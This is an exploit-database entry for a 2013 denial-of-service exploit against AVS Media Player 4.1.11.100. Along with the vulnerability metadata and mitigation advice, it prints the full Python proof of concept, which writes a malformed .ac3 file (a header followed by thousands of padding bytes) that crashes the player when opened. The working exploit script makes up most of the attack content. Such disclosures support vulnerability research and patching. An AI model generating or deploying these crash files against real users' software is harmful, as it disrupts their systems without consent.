header-logo
Suggest Exploit
vendor:
AVS Media Player
by:
metacom
7,8
CVSS
HIGH
Denial of Service
400
CWE
Product Name: AVS Media Player
Affected Version From: 4.1.11.100
Affected Version To: 4.1.11.100
Patch Exists: YES
Related CWE: N/A
CPE: a:online_media_technologies:avs_media_player
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7
2013

AVS Media Player(.ac3)Denial of Service Exploit

AVS Media Player version 4.1.11.100 is vulnerable to a denial of service attack when a specially crafted .ac3 file is opened. The file contains a buffer of bytes followed by a large amount of junk data and a small amount of bob data. When the file is opened, the application crashes.

Mitigation:

Update to the latest version of AVS Media Player
Source

Exploit-DB raw data:

#!/usr/bin/python
print """
 [+]Exploit Title:AVS Media Player(.ac3)Denial of Service Exploit
 [+]Vulnerable Product:4.1.11.100
 [+]Download Product:http://www.avs4you.com/de/downloads.aspx
 [+]All AVS4YOU Software has problems with format .ac3
 [+]Date: 29.06.2013
 [+]Exploit Author: metacom
 [+]RST
 [+]Tested on: Windows 7
 """

buffer=(
"\x0B\x77\x3E\x68\x50\x40\x43\xE1\x06\xA0\xB9"
"\x65\xFF\x3A\xBE\x7C\xF9\xF3\xE7\xCF\x9F\x3E"
)

junk = "\x41" * 5000
bob = "\x42" * 100

exploit = buffer+ junk + bob
 
try:
    rst= open("exploit.ac3",'w')
    rst.write(exploit)
    rst.close()
    print("\nExploit file created!\n")
except:
    print "Error"